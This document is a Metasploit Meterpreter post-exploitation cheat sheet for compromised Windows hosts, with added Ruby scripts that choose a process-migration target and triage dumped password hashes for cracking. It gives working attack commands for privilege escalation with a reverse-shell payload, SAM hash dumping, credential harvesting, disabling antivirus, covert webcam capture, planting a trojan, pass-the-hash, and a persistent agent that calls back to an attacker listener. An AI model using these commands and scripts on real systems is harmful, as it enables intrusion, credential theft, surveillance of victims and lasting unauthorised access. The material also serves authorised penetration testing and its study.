- msf > sessions [options or ID]: Lists, interacts with, and kills spawned sessions. Sessions can be command shells, Meterpreter sessions, VNC sessions, and so on. sessions -l lists them, sessions -i <ID> interacts with one, sessions -k <ID> kills one, and sessions -h prints the full help.
- meterpreter > background: Sends the current Meterpreter session to the background (it stays alive) and returns you to the msf prompt; re-enter it later with sessions -i <ID>.
- meterpreter > getuid: Displays the user account the Meterpreter server is running as on the host (for example, Server username: NT AUTHORITY\SYSTEM). Check this first: most of what follows depends on the privilege level it reports.
- meterpreter > sysinfo: Displays the victim's OS info.
- meterpreter > cd: Changes the current directory on the compromised system.
- meterpreter > ls: Lists the current directory's contents.
- meterpreter > pwd: Prints the current directory on the compromised system.
- meterpreter > ps: Displays a list of running processes on the target.
- meterpreter > run post/windows/manage/migrate: Migrates the Meterpreter server into another process on the victim. The built-in migrate <PID> command does the same for a process you pick yourself from the ps output.
- meterpreter > use priv: Loads the priv extension, which provides getsystem (and the built-in hashdump). Windows Meterpreter loads it automatically, so this is only needed if the extension is missing.
- meterpreter > getsystem: Attempts to elevate to NT AUTHORITY\SYSTEM using several named-pipe impersonation and token-duplication techniques (getsystem -h lists them). These techniques need the session to already hold local administrator rights, so on a low-privilege session expect the error below.
If you get the error priv_elevate_getsystem: Operation failed: Access is denied, background the session and use one of the two options below to find a local privilege-escalation exploit:
meterpreter > background
Option 1:
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
msf post(local_exploit_suggester) > set SESSION 1
msf post(local_exploit_suggester) > run
The suggester compares the session's OS version, patch level and architecture against the local exploit modules and prints the ones that are likely to work.
Option 2:
- msf > use exploit/windows/local/ followed by Tab: Tab completion lists the local Windows exploit modules (privilege escalation); search type:exploit path:windows/local shows the same list with descriptions.
- msf > use exploit/windows/local/ms10_015_kitrap0d: One exploit chosen from the list (KiTrap0D). This particular module only works against 32-bit Windows, so check sysinfo first. LPORT must differ from the port your existing handler is already bound to. Then:
msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.100
msf exploit(ms10_015_kitrap0d) > set LPORT 4445
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM (success: the new session runs as SYSTEM)
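The ps and migrate entries above leave the choice of target process to the operator. The following added example (not part of the original cheat sheet and not Metasploit's own code) parses the text Meterpreter's ps command prints and applies some common-sense heuristics to pick a migration target: stay in the same user context so the token is preserved, never touch the protected system processes whose death takes the host down, and prefer long-lived processes in the native architecture. The sample ps output is constructed, and the PROTECTED and PREFERRED lists are this example's own assumptions, not something Meterpreter enforces.

```ruby
# Added example: choose a `migrate` target from Meterpreter `ps` output.
# Heuristics (PROTECTED, PREFERRED) are assumptions of this example.
ProcInfo = Struct.new(:pid, :ppid, :name, :arch, :session, :user, :path)

# Constructed sample of `ps` output (not captured from a real host). Columns are
# separated by two or more spaces; a user name may contain a single space.
SAMPLE_PS = <<~'PS'
  Process List
  ============

   PID   PPID  Name          Arch  Session  User                 Path
   ---   ----  ----          ----  -------  ----                 ----
   0     0     [System Process]
   4     0     System        x64   0
   404   4     smss.exe      x64   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
   900   812   lsass.exe     x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
   1480  1020  explorer.exe  x64   1        DESKTOP-1\alice      C:\Windows\explorer.exe
   2200  1480  notepad.exe   x64   1        DESKTOP-1\alice      C:\Windows\System32\notepad.exe
   3012  812   spoolsv.exe   x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\spoolsv.exe
   3344  1480  payload.exe   x86   1        DESKTOP-1\alice      C:\Users\alice\Downloads\payload.exe
PS

# One data row: PID PPID Name Arch Session User [Path]. The user field is matched
# lazily so that "NT AUTHORITY\SYSTEM" survives; the path must follow 2+ spaces.
# Header lines and rows without a user (PID 0, PID 4) do not match and are skipped.
PS_LINE = /\A\s*(\d+)\s+(\d+)\s+(\S+)\s+(x86|x64)\s+(\d+)\s+(.+?)(?:\s{2,}(\S.*?))?\s*\z/

def parse_ps(text)
  text.each_line.map(&:rstrip).map do |line|
    m = PS_LINE.match(line)
    next unless m
    ProcInfo.new(m[1].to_i, m[2].to_i, m[3], m[4], m[5].to_i, m[6], m[7])
  end.compact
end

# Never migrate into these: crashing them blue-screens or logs off the host.
PROTECTED = %w[smss.exe csrss.exe wininit.exe winlogon.exe services.exe lsass.exe].freeze
# Long-lived, unremarkable processes make stable hosts for the Meterpreter server.
PREFERRED = %w[explorer.exe svchost.exe spoolsv.exe].freeze

def pick_migration_target(procs, current_pid:, user:, prefer_arch: 'x64')
  candidates = procs.reject { |p| p.pid == current_pid }            # not ourselves
                    .select { |p| p.user.casecmp?(user) }             # same token context
                    .reject { |p| PROTECTED.include?(p.name.downcase) }
  candidates.min_by do |p|
    [PREFERRED.index(p.name.downcase) || PREFERRED.size, # preferred names first
     p.arch == prefer_arch ? 0 : 1,                      # then native architecture
     p.pid]                                              # then deterministic tie-break
  end
end

if __FILE__ == $PROGRAM_NAME
  procs  = parse_ps(SAMPLE_PS)
  target = pick_migration_target(procs, current_pid: 3344, user: 'DESKTOP-1\alice')
  puts "migrate #{target.pid}   # #{target.name} (#{target.arch}, #{target.user})"
end
```

For the constructed listing above, a payload running as DESKTOP-1\alice lands in explorer.exe (PID 1480), while a SYSTEM session would be steered to spoolsv.exe rather than lsass.exe. Feed the function the real ps output from the session, or paste the same rules into a <ruby> block of a resource script, to turn the choice into a one-liner.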
- meterpreter > search: Locates files on the target host. For example, search -f passwords*.txt; add -d C:\\Users to restrict the search to a starting directory.
- meterpreter > cat [remote file path]: Displays the content of the given file.
- meterpreter > download [remote file path]: Downloads a file from the remote machine. Use double backslashes (or forward slashes) in Windows paths so the single backslash is not treated as an escape character. For example, download C:\\passwords.txt.
- meterpreter > upload [local file] [remote path]: Uploads a file to the target. For example, upload evil_trojan.exe C:\\windows\\system32.
- meterpreter > execute -f [program]: Runs a program on the target system. Useful flags: -a for arguments, -H to hide the window, -i to interact with the process, and -m to run it from memory without touching disk. For example, execute -f cmd.exe -i -H.
- meterpreter > shell: Drops into a native command shell on the target (cmd.exe on Windows, /bin/sh on Unix-like systems); type exit to return to the Meterpreter prompt.
- meterpreter > run post/windows/gather/hashdump: A post module that dumps the local account hashes from the SAM database. It needs SYSTEM privileges, so run it after getsystem or the escalation above succeeds; the built-in hashdump command from the priv extension does the same.
- meterpreter > ipconfig: Displays the network interfaces and addresses on the remote machine.
- meterpreter > webcam_list: Displays the currently available webcams on the target host.
- meterpreter > webcam_snap: Grabs a picture from a connected webcam on the target system and saves it to disk as a JPEG image. By default, the save location is the local current working directory with a randomized filename. For example, webcam_snap -i 1 -v false (camera index 1, do not auto-open the image).
- meterpreter > python_import [local python file]: Imports a local Python file and executes it on the victim's machine; run load python first to load the Python extension. For example, meterpreter > python_import -f /root/readAutoLogonREG.py.
- meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24: Performs an ARP scan of the given range from the compromised host to discover live hosts on its local network segment.
- meterpreter > run post/windows/gather/checkvm: Checks to see if the compromised host is a virtual machine.
- meterpreter > run post/windows/gather/credentials/credential_collector: Harvests password hashes and tokens on the compromised host.
- meterpreter > run post/windows/gather/dumplinks: The dumplinks module parses the .lnk files in a user's recent documents, which could be useful for further information gathering.
- meterpreter > run post/windows/gather/enum_applications: Enumerates the applications that are installed on the compromised host.
- meterpreter > run post/windows/gather/enum_logged_on_users: Returns a list of current and recently logged on users, along with their SIDs.
- meterpreter > run post/windows/gather/enum_shares: Returns a list of both configured and recently used shares on the compromised system.
- meterpreter > run post/windows/gather/enum_snmp: Enumerates the SNMP service configuration on the target, if present, including the community strings.
- meterpreter > run post/windows/gather/hashdump: Dumps the local users' accounts on the compromised host using the registry.
- meterpreter > run post/windows/gather/usb_history: Enumerates the USB drive history on the compromised system.
The remaining run <script> entries are legacy Meterpreter scripts. They have been deprecated in favour of post and local-exploit modules, so expect a deprecation warning, and prefer the module equivalents noted below where one exists.
- meterpreter > run getcountermeasure: Checks the security configuration on the victim's system and can disable security measures such as A/V, the firewall, and much more.
- meterpreter > run getgui -e: Enables RDP on a target system if it is disabled (module equivalent: post/windows/manage/enable_rdp).
- meterpreter > run gettelnet -e: Enables Telnet on the victim if it is disabled.
- meterpreter > run killav: Disables most antivirus programs running as a service on a target (module equivalent: post/windows/manage/killav).
- meterpreter > run remotewinenum -u administrator -p password123 -t 10.0.0.100: Enumerates another Windows host (-t) from the compromised system via WMIC, using the supplied credentials; the script prints where it stores the output logs.
- meterpreter > run scraper: Grabs the system information, including the entire registry.
- meterpreter > run winenum: A very detailed Windows enumeration script. It dumps tokens, hashes, and much more.
- meterpreter > run persistence -U -i 10 -p 443 -r 192.168.1.5: Configures a persistent Meterpreter agent that starts when a user logs on to the remote system (-U) and tries to connect back to our listener every 10 seconds at IP address 192.168.1.5 on port 443 (module equivalent: exploit/windows/local/persistence). It drops a VBScript payload on the host and adds an autorun registry entry, and prints a cleanup resource file; run that file at the end of the engagement to remove both artefacts.
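The two hashdump entries above (and credential_collector) hand you lines of the form username:RID:LM-hash:NT-hash::: without saying what to look for in them. The following added example (not part of the original cheat sheet and not Metasploit's own code) parses that output, flags the cases a practitioner checks first (accounts with an empty password, hosts that still store the weak LM hash, the built-in Administrator, and several accounts sharing one password), and emits the user:NT-hash format hashcat mode 1000 accepts with --username. The sample dump is constructed; the two hash constants are the well-known hashes of the empty string.

```ruby
# Added example: triage `hashdump` / post/windows/gather/hashdump output.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze # LM hash of "" : LM storage disabled
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze # NT hash of "" : account has no password

# Constructed sample (not captured from a real host). Status lines from the post
# module are interleaved with the hash lines, as they are in a real console.
SAMPLE_HASHDUMP = <<~DUMP
  [*] Obtaining the boot key...
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
  legacy:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
DUMP

HashEntry = Struct.new(:user, :rid, :lm, :nt) do
  def lm_stored?      = lm != EMPTY_LM   # a real LM hash is trivially crackable
  def empty_password? = nt == EMPTY_NT
end

# Keep only lines that really are user:rid:lm:nt:::; everything else is console noise.
def parse_hashdump(text)
  text.each_line.map(&:strip).map do |line|
    user, rid, lm, nt = line.split(':', -1)
    next unless rid =~ /\A\d+\z/ && [lm, nt].all? { |h| h =~ /\A\h{32}\z/ }
    HashEntry.new(user, rid.to_i, lm.downcase, nt.downcase)
  end.compact
end

# Human-readable findings, in the order an operator would act on them.
def triage(entries)
  findings = []
  entries.each do |e|
    findings << "#{e.user}: empty password" if e.empty_password?
    findings << "#{e.user}: LM hash stored (weak, crackable)" if e.lm_stored?
    findings << "#{e.user}: built-in Administrator (RID 500)" if e.rid == 500
  end
  # Identical NT hashes mean identical passwords: one crack (or pass-the-hash) opens all of them.
  entries.group_by(&:nt).each do |nt, group|
    next if group.size < 2 || nt == EMPTY_NT
    findings << "shared password: #{group.map(&:user).join(', ')}"
  end
  findings
end

# hashcat -m 1000 --username <file>; john --format=NT also reads this.
def to_hashcat(entries)
  entries.map { |e| "#{e.user}:#{e.nt}" }
end

if __FILE__ == $PROGRAM_NAME
  entries = parse_hashdump(SAMPLE_HASHDUMP)
  triage(entries).each { |f| puts "[!] #{f}" }
  puts to_hashcat(entries)
end
```

Shared NT hashes are worth acting on before any cracking starts: with a SYSTEM session you can pass the hash directly (for example with exploit/windows/smb/psexec), and if the same hash turns up on several hosts it is usually a shared local administrator password across the estate.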